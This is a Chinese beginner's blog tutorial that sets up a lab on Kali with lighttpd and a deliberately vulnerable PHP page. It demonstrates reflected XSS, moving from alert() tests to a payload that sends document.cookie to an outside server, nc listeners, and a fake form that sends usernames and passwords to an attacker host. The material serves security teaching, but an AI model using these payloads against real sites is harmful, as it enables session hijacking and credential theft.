XSS基础环境及实验演示教程(适合新手)

最新推荐文章于 2024-04-19 04:16:44 发布
最新推荐文章于 2024-04-19 04:16:44 发布
阅读量1.3k 收藏 10
点赞数 2
分类专栏: Kali渗透 渗透测试 文章标签: 安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WEARE001/article/details/130848798
版权

目录

前言

环境说明:

1、轻量级 Web 服务器 + PHP

2、易受XSS攻击的PHP程序

3、非持久性 XSS 攻击

4、窃取会话cookie

5 注入表单窃取密码

前言

        花了一点时间,做了一个“XSS基础环境及实验演示教程”,当然教程很简单,适合刚接触和安全行业的小伙伴去认识了解XSS漏洞,并且上手实操。

        欢迎各位提出问题和作者v一起交流:tomorrow_me-

环境说明:

Kali机器:192.168.2.108

Windows机器:192.168.2.105

为了中间实验过程方便,有时候会利用一台云服务器辅助,实验过程中出现为显示IP的地址或者不为以上两个IP时,均为云服务器。

1、轻级 Web 服务器 + PHP

任务 1. 重新同步包索引文件:

任务 2. 安装轻级和 PHP:

apt-get 安装 lighttpd php php-fpm php-cgi

安装 Lighttpd:sudo apt-get install lighttpd

安装 PHP 和 FastCGI 进程管理器(php-fpm):sudo apt-get install php-fpm

安装 PHP CGI 工具(php-cgi):sudo apt-get install php-cgi

lighttpd配置文件:/etc/lighttpd/conf-available/

启用命令:

sudo lighttpd-enable-mod fastcgi-php

最后,重启Lighttpd服务器以使更改生效:

sudo service lighttpd restart

任务 3. 重新加载 lighttpd 守护进程:

a) service lighttpd force‑reload

任务 4. 从受害者的浏览器检查 Web 服务器是否正在运可访问的。

a) http:// 192.168.2.108

2受XSS攻击的PHP程序

任务 1. 找到您的 lighttpd 络服务器的档根录:

a) lighttpd ⽹络服务器的默认根⽬录是什么?

/var/www/html/

任务 2. 创建一个新的 index.php 文件,这是一个欢迎用户名的简单 PHP 程序。用户名是使用 GET 方法获取的,如以下 PHP 模板所示:

a) 将 index.php 文件复制到文档根目录,然后从受害者的浏览器访问该文件。显示的是什么词?

任务 3. 我们受攻击的 PHP 程序 (index.php) 需要通过 GET 请求的参数(名称)来欢迎用户。

a) 如下所示欢迎用户admin 的URL 是什么?

http://192.168.2.108/index.php?username=admin

3、非持久性 XSS 攻击

任务 1. 在受害者的浏览器中,是发送一个简单的字符作为名称参数,而是尝试发送在名称前添加“<h1>”HTML 标记。在 HTML 中,<h1> 标签用于标题,预期结果是一个大的名称。

实验结果如下图所示:

指明实现该目的的完整 URL。

http://192.168.2.108/index.php?username=<h1>admin</h1>

任务 2. 查看受害者浏览器中的源代码。

a) 生成的源代码是什么?

如下图:

任务 3. 现在,我们将注入功能强大的 JavaScript 代码,而是注入基本的 HTML 标记。为确保我们的 JavaScript 代码在受害者的浏览器中运,我们将显示一条消息。为此,我们将使用 alert() JavaScript 函数。

a) 提供将在包含消息的 JavaScript 中执行 alert() 的恶意 URL 如下图所示被黑客入侵:

url: http://192.168.2.108/index.php?username=%3Cscript%3Ealert(%27hacked%27)%3C/script%3E

任务 4. 查看受害者浏览器中的源代码。

a) 生成的源代码是什么?

4、窃取会话cookie

任务 1. 要模拟具有会话 ID 的 Web 服务器,我们可以在 Web 服务器中使用 setcookie PHP 函数。这可以通过将以下内容添加到 index.php 文件来完成:

任务 2.在将 sessionID 发送到远程服务器之前,⼀个好的起点是在 JavaScript 中执⾏⼀些检查。使⽤ document.cookie Javascript 属性:

  1. 创建⼀个 URL,在受害者的浏览器中显⽰ cookie 值。为此,请使⽤ alert()

JavaScript 函数和 document.cookie JavaScript 属性。实现该⽬标的 URL 是什么?

url为:http://192.168.2.108/index.php?username=%3Cscript%3Ealert(document.cookie)%3C/script%3E

任务 3.最后,我们要将 cookie 值泄露到远程服务器。

  1. 在您的 Kali 机器中,使⽤ nc ⼯具检索渗出数据。阅读⼿册以了解如何运⾏ nc 以侦听端⼝ 80。指⽰ nc 侦听端⼝ 80 的参数是哪些?

参数 -l 表示监听模式,参数 -v 表示启用详细模式,参数 -p 指定监听的端口号。

  1. 使⽤上述可能的 JavaScript 代码之⼀,通过替换“...”来泄露会话 ID,通过适当的 JavaScript 代码。

192.168.2.108/index.php?username=admin<script>window.location="http://81.68.2.42/cookie.php%3Fcookie="%2Bdocument.cookiei</script>

通过这个代码,可以获取用户的cookie,并且拿到cookie。

http://81.68.122.42/cookie.php是我部署的http服务,cookie.php如下:

它会将窃取的cookie写入当前路径的cookies.txt中;如:

5 注入表单窃取密码

任务 1. 在此任务中,您需要创建一个 URL 以利用 index.php 文件中的 XSS 漏洞。我们需要做的是创建一个伪造的 HTML 表单,向受害者询问用户名和密码。

当受害者按下提交按钮时,凭据将被发送到由攻击者控制的远程服务器。

指示 nc 监听端口 9090 的参数是么?

参数 -l 表示监听模式,参数 -v 表示启用详细模式,参数 -p 指定监听的端口号。

允许您使用虚假表单窃取和泄(到您的 Kali 机器)受害者的用户名和密码的 URL 是么?

http://81.68.123.42:9090/login.php?username=admin&passowrd=123456

更多分享:VX公众号:安全info

流浪法师12
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网络攻防技术——XSS实验
学习记录
02-27 3357
一、题目 跨站点脚本(XSS)是一种常见于web应用程序中的计算机安全漏洞。此漏洞使攻击者有可能将恶意代码(如JavaScripts)注入受害者的web浏览器。 为了演示攻击者可以做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的web应用程序。我们已经注释掉了Elgg的一些保护方法,故意使其容易受到XSS攻击。学生们需要利用这些漏洞发动攻击,就像Samy Kamkar在2005年通过臭名昭著的Samy蠕虫对MySpace所做的那样。此攻击的最终目标是在用户之间传播XSS蠕虫,这样无论
【网络攻防技术】实验七—— XSS攻击实验(Elgg)
qq_45755706的博客
03-01 7398
文章目录一、实验题目二、实验步骤及结果配置相关环境Task1: Posting a Malicious Message to Display an Alert WindowTask 2: Posting a Malicious Message to Display CookiesTask 3: Stealing Cookies from the Victim’s MachineTask 4: Becoming the Victim’s FriendTask 5: Modifying the Victim’s
网络攻防-XSS攻击实验
qq_64389397的博客
01-07 1766
1.在传播病毒的同时,将病毒也复制在about me中,这样这段代码就会一直存在,所有访问都在自己的about字段添加这段代码,这样就能一直传第下去。如果不添加If判断,如果时samy自己进入个人简介,也会触发JavaScript代码,但是因为post的about me字段为空,那么这段JavaScript代码将会被清空,所以需要加上这段if判断,这样当当前用户是samy时,不会触发。3.由获取的信息可知,接口的url地址,post提交数据的方式,使用这些信息填入JavaScript框架的对应信息中。
【网络安全】嘴对嘴教你利用XSS攻击,体验一次当黑客的感觉_登录口xss(1)
最新发布
2401_83946570的博客
04-19 910
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。没错,如果是前端的同学或许已经猜到了,h是浏览器的标签,这样传给服务器,服务器再返回给前端,浏览器渲染的时候,会把第二行当成h1标签来渲染,就会出现以下效果,第二行文字被加粗加大了。增删改查在web管理系统中中很常见,我们找到一个新增功能页面,这以一个富文本输入框为例,输入以下语句,点击保存,再去查看详情,你觉得会发生什么?
带你利用XSS攻击体验一次黑客
2301_77472496的博客
05-09 242
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。XSS是web安全最为常见的攻击方式,在近年来,常居web安全漏洞榜首。
【网络攻防技术】XSS攻击手实验——Cross-Site Scripting (XSS) Attack Lab
omniscience的博客
11-13 736
可以利用www.example60.com,image_www文件夹下的apache_csp.conf文件有这些网站的根目录信息,可以把代码保存在www.example60.com,让代码调用这个网站的JavaScript代码。self表示只允许从同一域名加载资源,*.example.com表示只允许加载该域名的子域名的资源,unsafe-inline允许内联脚本(一般指script标签的JS代码)、onclick等的执行。此任务的目标是发布一条包含JavaScript的恶意消息,以显示一个警报窗口。
【网络安全】手把手教你利用XSS攻击体验一次黑客
喜欢Python编程的程序员柚柚呀
01-25 919
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。XSS是web安全最为常见的攻击方式,在近年来,常居web安全漏洞榜首。
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
XSS漏洞挖掘及利用教程
07-31
XSS漏洞挖掘及利用教程,还有大量QQ邮箱的XSS和各种XSS漏洞实战解析哦!
xss-lab全通关教程
05-07
XSS(Cross-Site Scripting)实验室全通关教程是一份深度学习和实践XSS漏洞攻防的宝贵资源。XSS是一种常见的网络安全问题,它允许攻击者在用户浏览器中注入恶意脚本,从而窃取敏感信息、操纵用户行为或进行其他危害...
XSS的攻击及防御代码的简单演示
04-25
在“XSS的攻击及防御代码的简单演示”中,我们将探讨XSS的分类、攻击方式以及如何通过编程防御这些攻击。首先,XSS通常分为三种类型:存储型XSS、反射型XSS和DOM型XSS。 1. 存储型XSS:攻击者将恶意脚本插入到网站...
XSS高级实战教程
09-28
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的...
渗透测试之XSS漏洞:记一次模拟注入攻击
遇事不决 可问春风
09-18 2945
XSS(cross-site script)跨站脚本攻击是一种web应用程序前端漏洞。攻击者将代码注入,用户在使用时由浏览器对漏洞代码进行解析,从而达到恶意攻击用户的特殊目的。
【burpsuite安全练兵场-客户端11】跨站点脚本XSS-10个实验(下)
01-14 9600
【BP靶场portswigger-客户端11-跨站点脚本XSS】10个实验-万文详细步骤
XSS攻击实战
qq_44915227的博客
04-18 2382
XSS攻击全程跨站脚本攻击。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。与SQL注入类似,XSS也是利用提交恶意信息来实现攻击,但是XSS一般提交的是JavaScript脚本,运行在Web端,就是用户的浏览器。SQL注入提交的SQL命令在后台的数据库服务器执行。
简单模拟XSS攻击原理——成功验证
qq_39123467的博客
10-16 817
简单模拟csrf攻击原理——成功验证
【编程导航】手把手教你利用XSS攻击体验一次黑客
wuli1024的博客
01-03 1269
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。
web安全XSS测试平台使用教程
热门推荐
平平无奇
08-12 2万+
我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 一、注册用户并登录 二、创建项目 1.创建项目,创建完后会生成一个xss可用脚本地址 项目名...
XSS(Stored)实验
06-09
XSS(Cross-site scripting)攻击是一种常见的网络攻击,其中攻击者通过注入恶意脚本或代码来窃取用户的信息或控制用户的浏览器。其中,Stored XSS攻击是攻击者将恶意脚本或代码存储到目标网站的数据库中,然后在用户访问该网站时,恶意代码会被服务器发送给用户的浏览器执行。 由于XSS攻击的危害性很大,因此许多网站都会对此进行防护。但是,为了能够更好地了解XSS攻击,您可以进行一些实验以模拟攻击的过程。以下是一些简单的步骤: 1. 找到一个允许用户输入内容的网站,例如评论区或搜索框等。 2. 在输入框里输入一些简单的HTML代码,例如`<script>alert('XSS attack')</script>`,然后提交表单。 3. 如果您看到了一个弹出窗口,说明您已经成功地注入了恶意代码,并成功地执行了XSS攻击。 请注意,在实际应用中,XSS攻击可能需要更加复杂的代码或技巧才能成功,因此请勿尝试攻击其他人的网站或系统,否则可能会涉及违法行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流浪法师12

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值